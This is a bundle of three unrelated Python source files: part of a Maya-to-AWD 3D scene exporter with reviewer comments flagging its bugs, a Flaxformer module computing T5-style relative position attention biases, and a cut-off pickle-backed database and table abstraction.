    NOTE(review): several attributes used by the methods below are never
    initialized in __init__ (joints_per_vert, alpha_blending,
    alpha_threshold, user_ns) -- presumably the file-translator front-end
    assigns them before export() runs; confirm against the caller.
    """

    def __init__(self, file, compression, wide_geom=False, wide_mtx=False):
        # Output stream the finished AWD document is flushed to.
        self.file = file
        # DAG path -> AWD block, so blocks are reused instead of duplicated.
        self.block_cache = MayaAWDBlockCache()
        # Root paths of all skeletons exported so far.
        self.skeleton_paths = []
        # Joint name -> index within its skeleton (filled by export_skeleton).
        self.joint_indices = {}
        # Shape path -> list of original vertex indices, one per condensed
        # vertex (filled by export_mesh_data, consumed by export_skeletons).
        self.mesh_vert_indices = {}
        # Export feature toggles; all off until the caller enables them.
        self.include_attr = False
        self.include_geom = False
        self.include_scene = False
        self.flatten_untransformed = False
        self.replace_exrefs = False
        self.include_uvanim = False
        self.include_skelanim = False
        self.include_skeletons = False
        self.include_materials = False
        self.include_cameras = False
        self.include_lights = False
        self.embed_textures = False
        self.animation_sequences = []
        # Flipped to True once any skin binding has been exported.
        self.has_skelanim = False
        self.awd = AWD(compression=compression, wide_geom=wide_geom, wide_mtx=wide_mtx)

    def export(self, selection):
        """Run the configured export passes and flush the AWD document.

        NOTE(review): `selection` is unused -- the whole scene is walked
        regardless; confirm whether selective export was intended.
        """
        # Assume that bind pose is on frame 1
        # NOTE(review): frame 0 is viewed despite the comment above --
        # confirm which frame actually holds the bind pose.
        om.MGlobal.viewFrame(0)
        self.export_scene()
        if self.include_skeletons:
            self.export_skeletons()
        if self.include_skelanim and self.has_skelanim:
            self.export_animation(self.animation_sequences)
        self.awd.flush(self.file)

    def export_scene(self):
        """Depth-first walk of the DAG exporting transforms as meshes,
        cameras or plain containers; invisible branches are pruned."""
        dag_it = om.MItDag(om.MItDag.kDepthFirst)
        while not dag_it.isDone():
            # A node counts as visible only if both its own visibility and
            # its 'ovv' attribute (presumably overrideVisibility -- confirm)
            # are on; nodes lacking the attributes are treated as invisible.
            visible = False
            try:
                attr0 = '%s.visibility' % dag_it.partialPathName()
                attr1 = '%s.ovv' % dag_it.partialPathName()
                visible = mc.getAttr(attr0) and mc.getAttr(attr1)
            except:
                pass
            if visible:
                if dag_it.currentItem().hasFn(om.MFn.kTransform):
                    transform = dag_it.fullPathName()
                    print('')
                    print('================================================')
                    print('export %s' % dag_it.fullPathName())
                    print('================================================')

                    def find_nearest_cached_ancestor(child_dag_fn):
                        # Climb the first-parent chain until an already
                        # exported (cached) ancestor is found, or None at
                        # the root.
                        if child_dag_fn.parentCount() > 0:
                            parent_dag_fn = om.MFnDagNode(child_dag_fn.parent(0))
                            print('looking in cache for "%s"' % parent_dag_fn.fullPathName())
                            awd_parent = self.block_cache.get(parent_dag_fn.fullPathName())
                            if awd_parent is not None:
                                return awd_parent
                            else:
                                return find_nearest_cached_ancestor(parent_dag_fn)
                        else:
                            return None

                    dag_fn = om.MFnDagNode(dag_it.currentItem())
                    awd_parent = find_nearest_cached_ancestor(dag_fn)
                    shapes = mc.listRelatives(transform, s=True, f=True)
                    if shapes is not None:
                        shape = shapes[0]
                        api_type = mc.nodeType(shape, api=True)
                        if api_type == 'kMesh':
                            self.export_mesh(transform, shape, awd_parent)
                        elif api_type == 'kCamera' and self.include_cameras:
                            # Cameras for some reason are "shapes" in Maya
                            self.export_camera(transform, awd_parent)
                    elif not dag_it.currentItem().hasFn(om.MFn.kJoint):
                        # Container!
                        mtx = mc.xform(transform, q=True, m=True)
                        # Skip this container if untransformed and transformation is identity
                        id_mtx = [1,0,0,0, 0,1,0,0, 0,0,1,0, 0,0,0,1]
                        if not (self.flatten_untransformed and mtx == id_mtx):
                            ctr = AWDContainer(name=dag_it.partialPathName(), transform=self.mtx_list2awd(mtx))
                            print('saving in cache with id %s' % transform)
                            self.block_cache.add(transform, ctr)
                            if awd_parent is not None:
                                awd_parent.add_child(ctr)
                            else:
                                self.awd.add_scene_block(ctr)
                            self.set_attributes(transform, ctr)
            else:
                if dag_it.fullPathName():  # Not root
                    # Stop iterating this branch of the tree
                    dag_it.prune()
                    print('skipping invisible %s' % dag_it.fullPathName())
            dag_it.next()

    def export_camera(self, transform, awd_parent):
        """Export a camera transform as a free perspective AWD camera."""
        mtx = mc.xform(transform, q=True, m=True)
        cam = AWDCamera(self.get_name(transform), AWDMatrix3x4(mtx))
        cam.type = CAM_FREE
        cam.lens = LENS_PERSPECTIVE
        # vfv = vertical field of view
        cam.fov = mc.camera(transform, q=True, vfv=True)
        if awd_parent is not None:
            awd_parent.add_child(cam)
        else:
            self.awd.add_scene_block(cam)

    def export_skeletons(self):
        """Attach per-vertex joint weight/index streams to cached meshes.

        Iterates all skin clusters; for each whose skeleton and mesh were
        both previously exported (present in the block cache), builds
        joints_per_vert (weight, joint-index) pairs per vertex, keeping the
        strongest influences and normalizing them.
        """
        dag_it = om.MItDependencyNodes(om.MFn.kSkinClusterFilter)
        while not dag_it.isDone():
            obj = dag_it.thisNode()
            joints = om.MDagPathArray()
            skin_fn = omanim.MFnSkinCluster(obj)
            num_joints = skin_fn.influenceObjects(joints)
            # Loop through joints and look in block cache whether
            # a skeleton for this joint has been exported. If not,
            # we will ignore this binding altogether.
            skel = None
            #print('found skin cluster for %s!' % skel)
            for i in range(num_joints):
                #print('affected joint: %s' % joints[i].fullPathName())
                skel = self.block_cache.get(self.get_skeleton_root(joints[i].fullPathName()))
                if skel is not None:
                    break
            # Skeleton was found
            if skel is not None:
                #print('found skeleton in cache!')
                #print('num joints: %d' % num_joints)
                # Loop through meshes that are influenced by this
                # skeleton, and add weight stream to their mesh data
                num_geoms = skin_fn.numOutputConnections()
                #print('num geoms: %d' % num_geoms)
                for i in range(num_geoms):
                    skin_path = om.MDagPath()
                    skin_fn.getPathAtIndex(i, skin_path)
                    vert_it = om.MItMeshVertex(skin_path)
                    #print('skin obj: %s' % skin_path.fullPathName())
                    # Check whether a mesh data for this geometry has
                    # been added to the block cache. If not, bindings
                    # for this mesh can be ignored.
                    md = self.block_cache.get(self.get_name(skin_path.fullPathName()))
                    if md is not None:
                        #print('found mesh in cache!')
                        weight_data = []
                        index_data = []
                        self.has_skelanim = True
                        while not vert_it.isDone():
                            comp = vert_it.currentItem()
                            weights = om.MDoubleArray()
                            weight_objs = []
                            #script_util = om.MScriptUtil()
                            for ii in range(num_joints):
                                skin_fn.getWeights(skin_path, comp, ii, weights)
                                joint_name = joints[ii].fullPathName()
                                joint_idx = self.joint_indices[joint_name.split('|')[-1]]
                                weight_objs.append( (joint_idx, weights[0]) )

                            # Python 2 cmp-style sort: strongest influence first.
                            def comp_weight_objs(wo0, wo1):
                                if wo0[1] > wo1[1]: return -1
                                else: return 1
                            weight_objs.sort(comp_weight_objs)

                            # Normalize top weights
                            weight_objs = weight_objs[0:self.joints_per_vert]
                            sum_obj = reduce(lambda w0,w1: (0, w0[1]+w1[1]), weight_objs)
                            if sum_obj[1] > 0.0:
                                # NOTE(review): relies on Python 2 map()
                                # returning a list (extended/iterated below);
                                # breaks on Python 3.
                                weight_objs = map(lambda w: (w[0], w[1] / sum_obj[1]), weight_objs)
                            # Add more empty weight objects if too few
                            if len(weight_objs) != self.joints_per_vert:
                                weight_objs.extend([(0,0)] * (self.joints_per_vert - len(weight_objs)))
                            for w_obj in weight_objs:
                                index_data.append(w_obj[0])
                                weight_data.append(w_obj[1])
                            vert_it.next()

                        weight_stream = []
                        index_stream = []
                        # This list contains the old-index of each vertex in the AWD vertex stream
                        vert_indices = self.mesh_vert_indices[skin_path.fullPathName()]
                        for idx in vert_indices:
                            start_idx = idx*self.joints_per_vert
                            end_idx = start_idx + self.joints_per_vert
                            w_tuple = weight_data[start_idx:end_idx]
                            i_tuple = index_data[start_idx:end_idx]
                            weight_stream.extend(w_tuple)
                            index_stream.extend(i_tuple)
                        if len(md) == 1:
                            print('Setting streams!')
                            sub = md[0]
                            sub.add_stream(pyawd.geom.STR_JOINT_WEIGHTS, weight_stream)
                            sub.add_stream(pyawd.geom.STR_JOINT_INDICES, index_stream)
                        else:
                            print('skinning not implemented for meshes with <> 1 sub-mesh')
            dag_it.next()

    def export_animation(self, sequences):
        """Sample each (name, start_frame, end_frame) sequence frame by frame
        into skeleton poses (and UV animation frames, currently disabled)."""
        #TODO: Don't hard-code these.
        #animated_materials = [ 'MAT_BlueEye_L', 'MAT_BlueEye_R' ]
        #animated_materials = [ 'MAT_BrownEye_L', 'MAT_BrownEye_R' ]
        animated_materials = []
        for seq in sequences:
            frame_idx = seq[1]
            end_frame = seq[2]
            print('exporting sequence "%s" (%d-%d)' % seq)
            if len(self.skeleton_paths) > 0:
                anim = AWDSkeletonAnimation(seq[0])
                self.awd.add_skeleton_anim(anim)
            uvanims = []
            for mat in animated_materials:
                uvanim = AWDUVAnimation(mat.replace('MAT', 'UVANIM')+'_'+seq[0])
                uvanims.append(uvanim)
                self.awd.add_uv_anim(uvanim)
            while frame_idx <= end_frame:
                om.MGlobal.viewFrame(frame_idx)
                self.sample_materials(animated_materials, uvanims)
                for skeleton_path in self.skeleton_paths:

                    def get_all_transforms(joint_path, list):
                        # Depth-first collection of each joint's local
                        # transform, mirroring the joint indexing order.
                        mtx_list = mc.xform(joint_path, q=True, m=True)
                        list.append( self.mtx_list2awd(mtx_list))
                        children = mc.listRelatives(joint_path, type='joint')
                        if children is not None:
                            for child in children:
                                get_all_transforms(child, list)

                    skel_pose = AWDSkeletonPose()
                    all_transforms = []
                    get_all_transforms(skeleton_path, all_transforms)
                    for tf in all_transforms:
                        skel_pose.add_joint_transform(tf)
                    #TODO: Don't hard-code duration
                    anim.add_frame(skel_pose, 40)
                    self.awd.add_skeleton_pose(skel_pose)
                # Move to next frame
                frame_idx += 1

    def export_mesh(self, transform, shape, awd_ctr):
        """Export a mesh: shared geometry (via cache) plus a mesh instance,
        or an empty container when it is an external reference."""
        try:
            mtx = mc.xform(transform, q=True, m=True)
        except:
            print('skipping invalid %s' % transform)
            # NOTE(review): there is no return here -- if xform fails, `mtx`
            # is unbound and the code below raises NameError. Confirm an
            # early return was intended.
        tf_name = self.get_name(transform)
        sh_name = self.get_name(shape)
        tf_is_ref = mc.referenceQuery(transform, inr=True)
        sh_is_ref = mc.referenceQuery(shape, inr=True)
        if (tf_is_ref or sh_is_ref) and self.replace_exrefs:
            # This is an external reference, and it should be
            # replaced with an empty container in the AWD file
            ctr = AWDContainer(name=tf_name, transform=AWDMatrix3x4(mtx))
            self.set_attributes(transform, ctr)
            self.block_cache.add(transform, ctr)
            if awd_ctr is not None:
                awd_ctr.add_child(ctr)
            else:
                self.awd.add_scene_block(ctr)
        else:
            md = self.block_cache.get(sh_name)
            if md is None:
                print('Creating mesh data %s' % sh_name)
                md = AWDTriGeom(sh_name)
                md.bind_matrix = AWDMatrix3x4(mtx)
                self.export_mesh_data(md, shape)
                self.awd.add_tri_geom(md)
                self.block_cache.add(sh_name, md)
            inst = AWDMeshInst(md, tf_name, self.mtx_list2awd(mtx))
            self.set_attributes(transform, inst)
            # Look for materials
            if self.include_materials:
                self.export_materials(transform, inst)
            self.block_cache.add(transform, inst)
            if awd_ctr is not None:
                awd_ctr.add_child(inst)
            else:
                self.awd.add_scene_block(inst)
            if self.include_skeletons:
                history = mc.listHistory(transform)
                clusters = mc.ls(history, type='skinCluster')
                if len(clusters) > 0:
                    #TODO: Deal with multiple clusters?
                    sc = clusters[0]
                    influences = mc.skinCluster(sc, q=True, inf=True)
                    if len(influences) > 0:
                        skel_path = self.get_skeleton_root(influences[0])
                        if self.block_cache.get(skel_path) is None:
                            self.export_skeleton(skel_path)

    def export_materials(self, transform, awd_inst):
        """Walk the shading engines assigned to `transform` and attach
        AWD materials/textures (created once, then reused via the cache)."""
        sets = mc.listSets(object=transform, t=1, ets=True)
        if sets is not None:
            # NOTE(review): `set` shadows the builtin; kept as-is.
            for set in sets:
                if mc.nodeType(set)=='shadingEngine':
                    tex = None
                    mat = None
                    mat_his = mc.listHistory(set)
                    for state in mat_his:
                        state_type = mc.nodeType(state)
                        if state_type == 'lambert':
                            mat = self.block_cache.get(state)
                            if mat is None:
                                mat = AWDMaterial(AWDMaterial.BITMAP, name=self.get_name(state))
                                self.awd.add_material(mat)
                                self.block_cache.add(state, mat)
                                print('created material')
                                if self.alpha_blending or self.alpha_threshold > 0.0:
                                    # Check if transparency is an input (rather than scalars)
                                    # in which case the material needs to be marked as transparent,
                                    # to indicate that the texture's alpha channel should be used.
                                    tr_input = mc.connectionInfo('%s.it' % state, isDestination=True)
                                    if tr_input:
                                        if self.alpha_threshold > 0.0:
                                            mat.alpha_threshold = self.alpha_threshold
                                        else:
                                            mat.alpha_blending = True
                            awd_inst.materials.append(mat)
                            print('adding material ' + state)
                        # Only check the first file, which will likely be the color input.
                        # TODO: This needs to be solved in a prettier way for normal maps
                        # and other inputs like that.
                        elif state_type == 'file' and tex is None:
                            tex = self.block_cache.get(state)
                            if tex is None:
                                tex_abs_path = str(mc.getAttr(state+'.fileTextureName'))
                                if self.embed_textures:
                                    tex = AWDBitmapTexture(AWDBitmapTexture.EMBED, name=self.get_name(state))
                                    tex.embed_file(tex_abs_path)
                                    print('embedding %s' % tex_abs_path)
                                else:
                                    tex = AWDBitmapTexture(AWDBitmapTexture.EXTERNAL, name=self.get_name(state))
                                    tex.url = mc.workspace(pp=tex_abs_path)
                                self.awd.add_texture(tex)
                                self.block_cache.add(state, tex)
                                print('created texture')
                            if mat is not None:
                                mat.texture = tex
                        elif state_type == 'place2dTexture' and mat is not None:
                            # Determine from place2dTexture node whether
                            # this material should repeat/wrap
                            rep_uv = mc.getAttr('%s.re' % state)[0]
                            if rep_uv[0] != 1.0 or rep_uv[1] != 1.0:
                                mat.repeat = True
                            elif mc.getAttr(state+'.wu') or mc.getAttr(state+'.wv'):
                                mat.repeat = True

    def sample_materials(self, animated_materials, uvanims):
        """Record one UV-animation frame per animated material at the
        current time, from its place2dTexture translate-frame values."""
        idx = 0
        for mat in animated_materials:
            pt = None
            mat_his = mc.listHistory(mat)
            #print('sampling mat', mat)
            uvanim = uvanims[idx]
            # Find most recent place2DTexture
            for state in mat_his:
                if mc.nodeType(state) == 'place2dTexture':
                    pt = state
                    break
            t = mc.getAttr(pt+'.tf')[0]
            #TODO: Don't hard-code duration
            uvanim.add_frame( AWDMatrix2x3([ 1, 0, 0, 1, -t[0], t[1] ]), 40)
            idx += 1

    def export_skeleton(self, root_path):
        """Export the joint hierarchy rooted at `root_path` as an AWD
        skeleton, recording inverse bind matrices and joint indices."""
        skel = AWDSkeleton(name=root_path)
        joints = []

        def create_joint(joint_path, world_mtx=None):
            # Recursively build AWD joints; world_mtx accumulates the
            # parent chain so the inverse bind matrix is in world space.
            dag_path = self.get_dag_from_path(joint_path)
            tf_fn = om.MFnTransform(dag_path.node())
            tf = tf_fn.transformation()
            joint_wm = tf.asMatrix()
            if world_mtx is not None:
                joint_wm = joint_wm * world_mtx
            ibm = joint_wm.inverse()
            awd_mtx = self.mtx_maya2awd(ibm)
            name = self.get_name(joint_path)
            joint = AWDSkeletonJoint(name=name, inv_bind_mtx=awd_mtx)
            self.joint_indices[joint_path] = len(joints)
            print('added joint %s as idx %d' % (joint_path, len(joints)))
            joints.append(name)
            children = mc.listRelatives(joint_path, type='joint')
            # NOTE(review): comma instead of %-formatting below -- this
            # prints a tuple rather than an interpolated string.
            print('JOINT CHILDREN: %s', str(children))
            if children is not None:
                for child_path in children:
                    joint.add_child_joint( create_joint(child_path, joint_wm) )
            return joint

        skel.root_joint = create_joint(root_path)
        self.awd.add_skeleton(skel)
        self.block_cache.add(root_path, skel)
        self.skeleton_paths.append(root_path)

    def get_skeleton_root(self, joint_path):
        """Walk up the DAG from a joint to its top-most ancestor path."""
        current = joint_path
        parent = mc.listRelatives(current, p=True)
        while parent:
            current = parent
            parent = mc.listRelatives(current, p=True)
        # listRelatives returns a list; unwrap to the single path string.
        if isinstance(current, list):
            current = current[0]
        return str(current)

    def get_dag_from_path(self, path):
        """Resolve a DAG path string to an OpenMaya MDagPath."""
        list = om.MSelectionList()
        list.add(path)
        dag_path = om.MDagPath()
        list.getDagPath(0, dag_path, om.MObject())
        return dag_path

    def export_mesh_data(self, md, shape_path):
        """Fill AWDTriGeom `md` with triangulated, per-face-vertex expanded
        and then condensed vertex/index/uv/normal streams for `shape_path`."""
        dag_path = self.get_dag_from_path(shape_path)
        if dag_path.hasFn(om.MFn.kMesh):
            exp_vert_list = []

            def get_uvs(vert_it, face_idx):
                # Return the (u, v) of this vertex on the given face.
                us = om.MFloatArray()
                vs = om.MFloatArray()
                uvis = om.MIntArray()
                # TODO: Deal with this failing (missing UVs)
                vert_it.getUVs(us, vs, uvis)
                for i in range(len(uvis)):
                    if uvis[i] == face_idx:
                        return (us[i],vs[i])
                print('NO UV FOUND!!!!! WHY!!!!!??')
                return (0,0)

            def get_vnormal(shape, vert_itx, face_idx):
                # Per-face-vertex normal queried via polyNormalPerVertex.
                vec = om.MVector()
                attr = '%s.vtxFace[%d][%d]' % (shape, vert_itx, face_idx)
                vec = mc.polyNormalPerVertex(attr, q=True, xyz=True)
                return vec

            benchmark_start()
            print('getting mesh data for %s' % dag_path.fullPathName())
            print('type: %s' % dag_path.node().apiTypeStr())
            vert_it = om.MItMeshVertex(dag_path.node())
            poly_it = om.MItMeshPolygon(dag_path.node())
            while not poly_it.isDone():
                tri_inds = om.MIntArray()
                tri_points = om.MPointArray()
                poly_index = poly_it.index()
                idx_triple = []
                poly_it.getTriangles(tri_points, tri_inds)
                for i in range(tri_inds.length()):
                    vert_index = tri_inds[i]
                    pidx_util = om.MScriptUtil()
                    vert_it.setIndex(vert_index, pidx_util.asIntPtr())
                    u,v = get_uvs(vert_it, poly_index)
                    normal = get_vnormal(shape_path, vert_index, poly_index)
                    pos = vert_it.position()
                    exp_vert_list.append(
                        [ vert_index, poly_index, pos[0], pos[1], pos[2], u, v, normal[0], normal[1], normal[2] ])
                poly_it.next()
            print('- Raw (expanded) data list created')
            benchmark_print()

            # Store this so binding (joint index) data can be
            # put into the right place of the new vertex list
            vert_indices = []
            self.mesh_vert_indices[dag_path.fullPathName()] = vert_indices
            vertices = []
            indices = []
            uvs = []
            normals = []
            exp_vert_inds = {}

            def has_vert(haystack, needle):
                # NOTE(review): `correct` is computed but never consulted,
                # and the function unconditionally returns -1 -- so no
                # vertex is ever considered a duplicate and nothing is
                # merged. Looks like an early return on a match was lost;
                # confirm intent before changing.
                idx = 0
                if needle[0] in exp_vert_inds:
                    for v_idx in exp_vert_inds[needle[0]]:
                        v = haystack[v_idx]
                        correct = True
                        for prop in range(2, 10):
                            if needle[prop] != v[prop]:
                                correct = False
                                break
                        idx += 1
                return -1

            merged_vertices = []
            print('- Creating condensed list')
            benchmark_start()
            for v in exp_vert_list:
                idx = has_vert(merged_vertices, v)
                if idx >= 0:
                    # Already has vertex
                    indices.append(idx)
                else:
                    # Store this for binding data
                    vert_indices.append(v[0])
                    # This vertex will be added into the expanded list of vertices,
                    # which can get very large. To enable fast look-up, we map it's
                    # original index to that in the expanded list
                    vert_index = v[0]
                    if vert_index not in exp_vert_inds:
                        exp_vert_inds[vert_index] = []
                    exp_vert_inds[vert_index].append(len(merged_vertices))
                    indices.append(len(merged_vertices))
                    merged_vertices.append(v)
            for v in merged_vertices:
                # Add vertex and index
                vertices.append(v[2]) # X
                vertices.append(v[3]) # Y
                vertices.append(-v[4]) # Z (inverted)
                uvs.append(v[5]) # U
                uvs.append(1-v[6]) # V
                normals.append(v[7]) # Normal X
                normals.append(v[8]) # Normal Y
                normals.append(-v[9]) # Normal Z (inverted)
            benchmark_print()
            print('- DONE! Flipping windings')
            benchmark_start()
            # Flip windings
            for idx in range(1, len(indices), 3):
                tmp = indices[idx]
                indices[idx] = indices[idx+1]
                indices[idx+1] = tmp
            benchmark_print()
            print('- Creating sub-mesh')
            sub = AWDSubGeom()
            sub.add_stream(pyawd.geom.STR_VERTICES, vertices)
            sub.add_stream(pyawd.geom.STR_TRIANGLES, indices)
            sub.add_stream(pyawd.geom.STR_UVS, uvs)
            sub.add_stream(pyawd.geom.STR_VERTEX_NORMALS, normals)
            print('- Adding sub-mesh')
            md.add_sub_geom(sub)
            # Store mesh data block to block cache

    def set_attributes(self, dag_path, awd_elem):
        """Copy user-defined Maya attributes onto the AWD element,
        namespaced under self.user_ns, when include_attr is enabled."""
        if self.include_attr:
            extra_attributes = mc.listAttr(dag_path, ud=True)
            if extra_attributes is not None:
                for attr in extra_attributes:
                    val = mc.getAttr('%s.%s' % (dag_path, attr))
                    awd_elem.attributes[self.user_ns][str(attr)] = val

    def get_name(self, dag_path):
        """Return the short (last path segment) name of a DAG path."""
        # TODO: Deal with unicode names. In pyawd?
        return str(dag_path.split('|')[-1])

    def mtx_list2awd(self, mtx):
        """Convert a flat 16-element Maya matrix into a 12-element AWD 3x4
        matrix, dropping the 4th column and negating z-related components
        (handedness flip -- presumably Maya right-handed to AWD left-handed;
        confirm against pyawd)."""
        mtx_list = [1,0,0,0,1,0,0,0,1,0,0,0]
        mtx_list[0] = mtx[0]
        mtx_list[1] = mtx[1]
        mtx_list[2] = -mtx[2]
        mtx_list[3] = mtx[4]
        mtx_list[4] = mtx[5]
        mtx_list[5] = -mtx[6]
        mtx_list[6] = -mtx[8]
        mtx_list[7] = -mtx[9]
        mtx_list[8] = mtx[10]
        mtx_list[9] = mtx[12]
        mtx_list[10] = mtx[13]
        mtx_list[11] = -mtx[14]
        return AWDMatrix3x4(mtx_list)

    def mtx_maya2awd(self, mtx):
        """Flatten an OpenMaya MMatrix (callable by (row, col)) into a list
        and convert it via mtx_list2awd."""
        mtx_list = []
        for i in range(16):
            row_idx = math.floor(i/4)
            col_idx = i%4
            mtx_list.append(mtx(int(row_idx), int(col_idx)))
        #mtx_list[1] *= -1
        #mtx_list[2] *= -1
        #mtx_list[3] *= -1
        #mtx_list[4] *= -1
        #mtx_list[8] *= -1
        #print(mtx_list[0:4])
        #print(mtx_list[4:8])
        #print(mtx_list[8:12])
        #print(mtx_list[12:])
        return self.mtx_list2awd(mtx_list)
|
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for relative position biases generalized to long inputs."""
from typing import Any, Callable
from flax import linen as nn
from flax.linen import partitioning
from jax import lax
import jax.numpy as jnp
import numpy as np
from flaxformer.types import Array
class RelativePositionBiasesGeneral(nn.Module):
  """Adds T5-style relative positional embeddings to the attention logits.

  This generalizes the original `RelativePositionBiases` implementation to
  accept an `rp_bucket` input of any shape, avoiding construction of
  an O(N^2) tensor for long inputs of length N. The original full attention
  `rp_bucket` can be retrieved with `full_att_rp_bucket()`.

  T5 uses a form of relative attention which biases the attention matrix, so
  each head effectively attends to things at different scales, irrespective of
  the contents of keys and queries.

  In the future, this class may be unified with classes which take into account
  key and query contents, like the original relative position embeddings of Shaw
  et al. and new proposals. However, this will rely on XLA to recover efficiency
  for this class (especially when, as in the original T5, the same bias matrix
  is shared for all layers).

  Attributes:
    num_buckets: Number of buckets to bucket distances between key and query
      positions into.
    max_distance: Maximum distance before everything is lumped into the last
      distance bucket.
    num_heads: Number of heads in the attention layer. Each head will get a
      different relative position weighting.
    dtype: Type of arrays through this module.
    embedding_init: initializer for relative embedding table.
  """
  num_buckets: int
  max_distance: int
  num_heads: int
  dtype: Any
  embedding_init: Callable[..., Array] = nn.linear.default_embed_init

  @staticmethod
  def relative_position_bucket(relative_position,
                               bidirectional=True,
                               num_buckets=32,
                               max_distance=128):
    """Translates relative position to a bucket number for relative attention.

    The relative position is defined as memory_position - query_position, i.e.
    the distance in tokens from the attending position to the attended-to
    position. If bidirectional=False, then positive relative positions are
    invalid.

    We use smaller buckets for small absolute relative_position and larger
    buckets for larger absolute relative_positions. All relative
    positions >=max_distance map to the same bucket. All relative
    positions <=-max_distance map to the same bucket. This should allow for
    more graceful generalization to longer sequences than the model has been
    trained on.

    Args:
      relative_position: an int32 array
      bidirectional: a boolean - whether the attention is bidirectional
      num_buckets: an integer
      max_distance: an integer

    Returns:
      a Tensor with the same shape as relative_position, containing int32
      values in the range [0, num_buckets)
    """
    ret = 0
    n = -relative_position
    if bidirectional:
      # Half the buckets encode the sign (past vs. future positions).
      num_buckets //= 2
      ret += (n < 0).astype(jnp.int32) * num_buckets
      n = jnp.abs(n)
    else:
      n = jnp.maximum(n, 0)
    # now n is in the range [0, inf)
    max_exact = num_buckets // 2
    is_small = (n < max_exact)
    # Distances >= max_exact are bucketed logarithmically up to max_distance;
    # anything farther is clamped into the last bucket below.
    val_if_large = max_exact + (
        jnp.log(n.astype(jnp.float32) / max_exact + jnp.finfo(jnp.float32).eps)
        / jnp.log(max_distance / max_exact) *
        (num_buckets - max_exact)).astype(jnp.int32)
    val_if_large = jnp.minimum(val_if_large, num_buckets - 1)
    ret += jnp.where(is_small, n, val_if_large)
    return ret

  def full_att_rp_bucket(self, qlen, klen, bidirectional=True):
    """Gets relative position buckets for full attention.

    Args:
      qlen: attention query length.
      klen: attention key length.
      bidirectional: a boolean - whether the attention is bidirectional

    Returns:
      int32 (qlen, klen) shaped array containing values in the range
      [0, num_buckets).
    """
    # TODO: should we be computing this w. numpy as a program
    # constant?
    context_position = np.arange(qlen, dtype=jnp.int32)[:, None]
    memory_position = np.arange(klen, dtype=jnp.int32)[None, :]
    relative_position = memory_position - context_position  # shape (qlen, klen)
    rp_bucket = self.relative_position_bucket(
        relative_position,
        bidirectional=bidirectional,
        num_buckets=self.num_buckets,
        max_distance=self.max_distance)
    return rp_bucket

  @nn.compact
  def __call__(self, rp_bucket: Array):
    """Produces relative position embedding attention biases.

    Args:
      rp_bucket: int32 containing values in the range [0, num_buckets). In the
        full attention case, this should have shape (qlen, klen).

    Returns:
      output: Attention bias array with shape `(1, num_heads) + rp_bucket.shape`
    """
    relative_attention_bias = partitioning.param_with_axes(
        'rel_embedding',
        self.embedding_init, (self.num_heads, self.num_buckets),
        jnp.float32,
        axes=('heads', 'relpos_buckets'))
    relative_attention_bias = jnp.asarray(relative_attention_bias, self.dtype)
    # Instead of using a slow gather, we create a leading-dimension one-hot
    # array from rp_bucket and use it to perform the gather-equivalent via a
    # contraction. For example, if `rp_bucket` has shape (qlen, klen), the
    # contraction looks like:
    # (num_head, num_buckets) x (num_buckets one-hot, qlen, klen).
    # This is equivalent to relative_attention_bias[:, rp_bucket]
    bcast_iota_shape = [self.num_buckets] + [1] * rp_bucket.ndim
    bcast_iota = lax.broadcasted_iota(jnp.int32, bcast_iota_shape, 0)
    rp_bucket_one_hot = jnp.array(
        rp_bucket[jnp.newaxis, ...] == bcast_iota, dtype=self.dtype)
    # --> shape (num_heads, rp_bucket.shape)
    values = lax.dot_general(
        relative_attention_bias,
        rp_bucket_one_hot,
        (
            ((1,), (0,)),  # lhs, rhs contracting dims
            ((), ())))  # no batched dims
    # Add a singleton batch dimension.
    # --> shape (1, num_heads, rp_bucket.shape)
    return values[jnp.newaxis, ...]
|
"""Module with abstraction for databases and tables."""
import os
import pandas as pd
from glob import glob
from typing import List, Optional
from cgnal.core.typing import PathLike
from cgnal.core.utils.fs import create_dir_if_not_exists
from cgnal.core.data.layer import DatabaseABC, TableABC
from cgnal.core.logging.defaults import WithLogging
class Database(WithLogging, DatabaseABC):
    """A database backed by a directory of pickle files, one per table."""

    def __init__(self, name: PathLike, extension: str = ".p") -> None:
        """
        Return an instance of a class implementing standard read and write methods to pickle data sources.

        :param name: path to pickles
        :param extension: standard pickle extension
        """
        if not os.path.exists(name):
            self.logger.info(f"Creating new database {name}")
        self.name = create_dir_if_not_exists(name)
        self.extension = extension

    @property
    def tables(self) -> List[str]:
        """
        Complete pickle names with appropriate extension.

        :return: pickle names with appropriate extensions
        """
        pattern = os.path.join(self.name, "*%s" % self.extension)
        suffix_len = len(self.extension)
        return [os.path.basename(match)[:-suffix_len] for match in glob(pattern)]

    def __getitem__(self, table_name: str) -> "Table":
        """
        Return table from the database.

        :param table_name: Name of the table
        :return: object of class PickleTable
        """
        return self.table(table_name)

    def table(self, table_name: str) -> "Table":
        """
        Select table.

        :param table_name: name of the table
        :return: object of class PickleTable
        """
        # A missing table is only worth a warning: the Table object is
        # handed back either way, exactly as before.
        if table_name not in self.tables:
            self.logger.warning(f"Table {table_name} not found in database {self.name}")
        return Table(self, table_name)
class Table(WithLogging, TableABC):
    """Class representing a Table in a Database, stored as one pickle file."""

    def __init__(self, db: Database, table_name: str) -> None:
        """
        Implement a constructor for tables using pickle file format.

        :param db: database to which the table belongs
        :param table_name: name of the table
        :raises ValueError: if db is not a Database instance
        """
        if not isinstance(db, Database):
            raise ValueError(
                f"The db should an instance of {'.'.join([Database.__module__, Database.__name__])}"
            )
        self.db = db
        self.name = table_name

    @property
    def filename(self) -> PathLike:
        """
        Return path to pickle.

        :return: path to pickle file
        """
        # Bug fix: use the database's configured extension instead of a
        # hard-coded ".p". Database.tables enumerates files by
        # db.extension, so the hard-coded suffix made tables invisible
        # (and unwritable in the expected location) whenever a
        # non-default extension was configured. Default behavior
        # (extension=".p") is unchanged.
        return os.path.join(self.db.name, "%s%s" % (self.name, self.db.extension))

    def to_df(self, query: Optional[str] = None) -> pd.DataFrame:
        """
        Read pickle.

        :param query: optional pandas query string to filter the result
        :return: pd.DataFrame or pd.Series read from pickle
        """
        df = pd.read_pickle(self.filename)
        return df if query is None else df.query(query)

    @property
    def data(self) -> pd.DataFrame:
        """
        Read pickle.

